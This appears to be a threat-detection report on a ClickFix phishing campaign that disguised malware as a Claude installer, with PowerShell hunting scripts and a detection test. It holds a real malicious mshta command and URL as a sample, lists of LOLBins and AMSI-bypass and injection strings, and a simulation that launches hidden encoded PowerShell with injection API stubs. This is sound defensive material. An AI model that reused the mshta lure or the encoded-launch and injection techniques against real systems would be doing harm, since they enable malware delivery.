ClickFix Phishing Campaign Disguised as a Claude Installer
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing campaign used the ClickFix technique to distribute a malicious MSIX bundle disguised as the Claude AI installer. Initial execution relied on mshta launched through the Windows Run utility with a specially crafted URL. The downloaded payload contained an HTA file that built an obfuscated PowerShell stage, bypassed AMSI, retrieved additional PowerShell content, and executed a process injection routine using encrypted shellcode. The activity was observed across customer environments in both Europe and the United States and was detected through Rapid7 InsightIDR coverage.
Investigation
Rapid7 analysts identified mshta execution linked to the RunMRU registry key and captured the URL download-version.1-5-8.com/claude.msixbundle. Analysis showed that the MSIX archive included an HTA file that decoded obfuscated strings, assembled a PowerShell command, overwrote the AMSI context, and ultimately injected shellcode through native Windows API calls. Researchers also found that several follow-on PowerShell stages were downloaded from dynamically generated URLs derived from a hash built from the victim’s computer name and username.
Mitigation
Defenders should monitor the RunMRU registry key for suspicious mshta entries and block mshta execution when it originates from untrusted sources. Organizations should also restrict downloads of MSIX packages from unknown domains and enforce application allow-listing for PowerShell execution. AMSI protections should remain enabled, and PowerShell logging should be configured to capture encoded or obfuscated command activity for investigation.
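As an added example that is not part of the Rapid7 report, the following PowerShell implements the RunMRU check described above. RunMRU records what a user typed into the Windows Run dialog (values named a, b, c, ... ordered by the MRUList value, each ending in "\1"), so a ClickFix lure leaves the pasted command there. The script parses a constructed sample (including the mshta URL captured in the investigation), flags LOLBin commands, package or script URLs and encoded or eval-style fragments, and then runs the same logic against the current user's hive. The function names, the LOLBin list and the flag reasons are this example's own choices, not the vendor's rule logic.

```powershell
# Added example: hunt the Run-dialog history (RunMRU) for LOLBin entries.
# Pattern list is an assumption of this example; extend it to taste.
$LolbinPattern = '\b(mshta|powershell|pwsh|cmd|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin|msiexec|curl)(\.exe)?\b'

function Test-RunMruEntry {
    param([string]$Entry)
    # Windows appends "\1" to every RunMRU entry; strip it before matching.
    $command = $Entry -replace '\\1$', ''
    $reasons = @()
    if ($command -match $LolbinPattern) { $reasons += "lolbin:$($Matches[1])" }
    if ($command -match 'https?://|\.msixbundle|\.hta\b') { $reasons += 'remote-or-package-url' }
    if ($command -match '-enc(odedcommand)?\s|frombase64string|\biex\b|invoke-expression') { $reasons += 'encoded-or-eval' }
    [pscustomobject]@{
        Command    = $command
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join ',')
    }
}

function Get-RunMruFindings {
    param([hashtable]$Entries)   # value name -> raw value, as read from the key
    # MRUList holds the value names from most to least recently used.
    $order = if ($Entries.ContainsKey('MRUList')) { $Entries['MRUList'].ToCharArray() } else { $Entries.Keys }
    foreach ($name in $order) {
        if ($name -eq 'MRUList' -or -not $Entries.ContainsKey([string]$name)) { continue }
        Test-RunMruEntry -Entry $Entries[[string]$name] |
            Add-Member -NotePropertyName ValueName -NotePropertyValue ([string]$name) -PassThru
    }
}

# Constructed sample (not a real hive dump) resembling the key after the lure was followed.
# The mshta target is the URL reported in the investigation; the other entries are benign.
$sample = @{
    'MRUList' = 'cab'
    'a'       = 'notepad\1'
    'b'       = 'mshta download-version.1-5-8.com/claude.msixbundle\1'
    'c'       = 'calc\1'
}
Get-RunMruFindings -Entries $sample | Format-Table ValueName, Suspicious, Reasons, Command -AutoSize

# Live check on the current user's hive. Loop over every loaded user hive under
# HKEY_USERS to cover all profiles on a shared host.
$key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
if (Test-Path $key) {
    $live = @{}
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |    # drop the provider's PSPath etc.
        ForEach-Object { $live[$_.Name] = [string]$_.Value }
    Get-RunMruFindings -Entries $live | Where-Object Suspicious |
        Format-Table ValueName, Reasons, Command -AutoSize
}
```

Running it against the sample flags value "b" (the most recent entry) with both a LOLBin match and a package URL; the live section prints nothing on a clean profile. Because RunMRU lives in each user's hive, telemetry such as registry_event that records writes to this key (the first detection listed above) is the scalable form of the same check.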
Response
When this activity is detected, security teams should isolate the affected endpoint, preserve the command-line artifacts, and conduct forensic analysis of the downloaded PowerShell stages and any injected processes. Credentials used on the impacted system should be reset, and browser history should be reviewed to trace the initial lure. Detection logic should also be updated to include the observed domains, hashes, and related execution patterns.
Attack Flow

graph TB
    %% Class Definitions
    classDef action fill:#99ccff

    %% Nodes
    step_phishing["<b>Action</b> – T1566.002 Phishing: Spearphishing Link<br/><b>Description</b>: Victim clicks a malicious link that launches mshta."]
    class step_phishing action
    step_mshta["<b>Action</b> – T1218.005 Mshta<br/><b>Description</b>: Execute mshta with a URL pointing to a .msixbundle payload."]
    class step_mshta action
    step_hta_deobfuscation["<b>Action</b> – T1027.010, T1027.013, T1140 Deobfuscate/Decode Files<br/><b>Description</b>: HTA runs VBS that de-obfuscates the embedded malicious code."]
    class step_hta_deobfuscation action
    step_ps_encoded["<b>Action</b> – T1059.001 PowerShell<br/><b>Description</b>: Generate an encoded PowerShell command."]
    class step_ps_encoded action
    step_stage1["<b>Action</b> – T1059.001 PowerShell (Stage 1)<br/><b>Description</b>: Compute MD5 of COMPUTERNAME+USERNAME, build URL and download Stage 2."]
    class step_stage1 action
    step_stage2["<b>Action</b> – T1562.001 Impair Defenses (AMSI Bypass)<br/><b>Description</b>: Overwrite AMSI context and download Stage 3."]
    class step_stage2 action
    step_stage3["<b>Action</b> – T1059.001 PowerShell (Stage 3)<br/><b>Description</b>: Decode byte array and create a ScriptBlock for execution."]
    class step_stage3 action
    step_process_injection["<b>Action</b> – T1055 Process Injection<br/><b>Description</b>: Inject code into a target process using .NET and native APIs."]
    class step_process_injection action
    step_persistence["<b>Action</b> – T1547.014 Registry Run Keys / Startup Folder (RunMRU)<br/><b>Description</b>: Create a RunMRU registry entry to achieve persistence."]
    class step_persistence action

    %% Connections
    step_phishing -->|leads_to| step_mshta
    step_mshta -->|executes| step_hta_deobfuscation
    step_hta_deobfuscation -->|uses| step_ps_encoded
    step_ps_encoded -->|generates| step_stage1
    step_stage1 -->|downloads| step_stage2
    step_stage2 -->|downloads| step_stage3
    step_stage3 -->|creates| step_process_injection
    step_mshta -->|establishes| step_persistence
Detections
- Suspicious RunMRU Entry With LOLBin Semantics (via registry_event)
- Suspicious Powershell Strings (via powershell)
- Call Suspicious .NET Methods from Powershell (via powershell)
- IOCs (HashSha256) to detect: ClickFix Phishing Campaign Masquerading as a Claude Installer
- Detect Obfuscated PowerShell Script and Process Injection via .NET [Windows Powershell]
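The "Suspicious Powershell Strings" and ".NET methods" detections above depend on where the strings are visible. As an added example (not the vendor's rule logic), the PowerShell below applies a string-indicator check to constructed inputs of two kinds: a process command line that uses -EncodedCommand, which must be base64/UTF-16LE decoded before any of the strings can be seen, and a script block as PowerShell script block logging (Event ID 4104) records it, already decoded. The indicator list, the alert threshold and the function names are assumptions of this example.

```powershell
# Added example: string-indicator check for PowerShell telemetry, with
# -EncodedCommand decoding so command-line sources are not blind to the payload.
# Indicator list is an assumption of this example, drawn from the strings this
# report names plus common .NET injection API names.
$SuspiciousStrings = @(
    'Invoke-Expression', 'FromBase64String',
    'System.Management.Automation.AmsiUtils', 'amsiInitFailed',
    'OpenProcess', 'WriteProcessMemory', 'CreateRemoteThread', 'VirtualAllocEx',
    'DllImport', 'Add-Type', '0x41414141'
)

function Expand-EncodedCommand {
    param([string]$CommandLine)
    # Match -e / -enc / -EncodedCommand followed by a base64 token; returns $null if absent or malformed.
    if ($CommandLine -match '(?i)-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
        try {
            $bytes = [Convert]::FromBase64String($Matches[2])
            return [Text.Encoding]::Unicode.GetString($bytes)   # -EncodedCommand is UTF-16LE
        } catch { return $null }
    }
    return $null
}

function Find-SuspiciousStrings {
    param([string]$Text)
    $hits = @(foreach ($s in $SuspiciousStrings) {
        if ($Text.IndexOf($s, [StringComparison]::OrdinalIgnoreCase) -ge 0) { $s }
    })
    return ,$hits   # always an array, even with zero or one hit
}

function Test-PowerShellEvent {
    param([string]$Source, [string]$Text)
    $decoded  = Expand-EncodedCommand -CommandLine $Text
    $scanText = if ($decoded) { "$Text`n$decoded" } else { $Text }
    $hits     = Find-SuspiciousStrings -Text $scanText
    [pscustomobject]@{
        Source   = $Source
        Decoded  = [bool]$decoded
        HitCount = $hits.Count
        Hits     = ($hits -join ', ')
        # Threshold chosen for this example: two indicators, or any AMSI reference, alerts.
        Alert    = ($hits.Count -ge 2) -or ($hits -contains 'System.Management.Automation.AmsiUtils')
    }
}

# --- constructed samples (not captured from a real incident) ---
$inner = @'
$decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))
Invoke-Expression $decoded
$ref = 'System.Management.Automation.AmsiUtils'
'@
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$samples = @(
    @{ Source = 'Sysmon 1 / 4688 command line'; Text = "powershell.exe -NoProfile -EncodedCommand $encoded" }
    @{ Source = '4104 script block';            Text = $inner }
    @{ Source = '4104 script block (benign)';   Text = 'Get-ChildItem C:\Temp | Measure-Object' }
)
$samples | ForEach-Object { Test-PowerShellEvent -Source $_.Source -Text $_.Text } |
    Format-Table Source, Decoded, HitCount, Alert, Hits -AutoSize
```

Both the decoded command line and the script block sample produce the same three hits and alert; the benign sample produces none. The practical point for the rules above is that a command-line-only data source sees just "-EncodedCommand <base64>", so either the collector decodes it, as this example does, or the rule is fed from script block logging.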
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Objective: Execute a malicious PowerShell payload that is both base-64 encoded and embedded with .NET assembly calls to perform process injection, mimicking a typical "living-off-the-land" attack.
- Steps:
  - Create a small .NET assembly (C#) that calls OpenProcess and WriteProcessMemory (simulated via PowerShell's [System.Runtime.InteropServices.Marshal]).
  - Encode the PowerShell script containing Invoke-Expression, FromBase64String, and a reference to System.Management.Automation.AmsiUtils (used to bypass AMSI).
  - Append a dummy marker 0x41414141 to emulate "padding" often seen in obfuscation.
  - Launch the script using powershell.exe with the full command line visible (so the detection rule can see the strings).
Regression Test Script:
# ==============================================================
# Simulated malicious PowerShell execution to trigger Sigma rule
# ==============================================================

# 1. Build a simple .NET payload (inline, for demo purposes). The P/Invoke stubs are
#    declared but never called; they exist so the OpenProcess/WriteProcessMemory
#    strings appear in the telemetry.
$cs = @'
using System;
using System.Runtime.InteropServices;
public class Injector {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
}
'@
# Add-Type errors if the type already exists in this session, so guard it.
if (-not ([System.Management.Automation.PSTypeName]'Injector').Type) {
    Add-Type -TypeDefinition $cs -Language CSharp
}

# 2. Craft the malicious-looking PowerShell snippet. The inner payload is a harmless
#    Write-Host; it is base64-encoded inside the snippet so that the decode and
#    Invoke-Expression steps genuinely run instead of failing on a bogus string.
$malicious = @'
$b64 = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'ClickFix simulation marker'"))
$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
Invoke-Expression $decoded
$amsiRef = 'System.Management.Automation.AmsiUtils'   # string reference only; no bypass is performed
$dummy = 0x41414141
'@

# 3. Encode the snippet (Base64 of UTF-16LE, as -EncodedCommand expects)
$bytes   = [System.Text.Encoding]::Unicode.GetBytes($malicious)
$encoded = [Convert]::ToBase64String($bytes)

# 4. Launch PowerShell with the encoded command; -PassThru returns the process so its PID is known for cleanup
Write-Host "Launching malicious PowerShell..."
$simProc = Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -EncodedCommand $encoded" -WindowStyle Hidden -PassThru
Write-Host "Launched simulated process with PID $($simProc.Id)"

# Note: the decoded script block (Event ID 4104, script block logging) will contain the strings:
# Invoke-Expression, FromBase64String, System.Management.Automation.AmsiUtils, 0x41414141
# which satisfy the Sigma detection condition. The process command line itself (4688 / Sysmon 1)
# shows only "-EncodedCommand <base64>", so the rule must be fed by PowerShell logging or the
# command line must be decoded first.
Cleanup Commands:
# Terminate any stray PowerShell instances launched by the test.
# Get-Process does not expose the arguments of processes it did not start itself
# (StartInfo is empty for them), so read the command line through CIM instead.
Get-CimInstance -ClassName Win32_Process -Filter "Name = 'powershell.exe'" |
    Where-Object { $_.CommandLine -match 'EncodedCommand' } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }

# Remove temporary variables from this session (the child process's own variables
# die with it; these are the ones the launcher script created)
Remove-Variable -Name cs, malicious, bytes, encoded, b64, decoded, dummy -ErrorAction SilentlyContinue
End of Report